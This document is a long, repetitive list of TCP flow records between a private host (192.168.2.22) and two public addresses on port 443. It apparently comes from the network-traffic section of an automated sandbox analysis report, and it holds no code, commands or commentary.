                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.162.95:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.162.95:443
                  Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.162.95:443
                  Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.162.95:443
                  Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.162.95:443
                  Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.162.95:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.162.95:443
                  Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.162.95:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.162.95:443
                  Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.162.95:443
                  Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.162.95:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.162.95:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.162.95:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.162.95:443
                  Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.67.162.95:443
                  Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.67.162.95:443
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.67.162.95:443
                  Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.67.162.95:443
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.67.162.95:443
                  Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.67.162.95:443
                  Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.67.162.95:443
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.67.162.95:443
                  Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
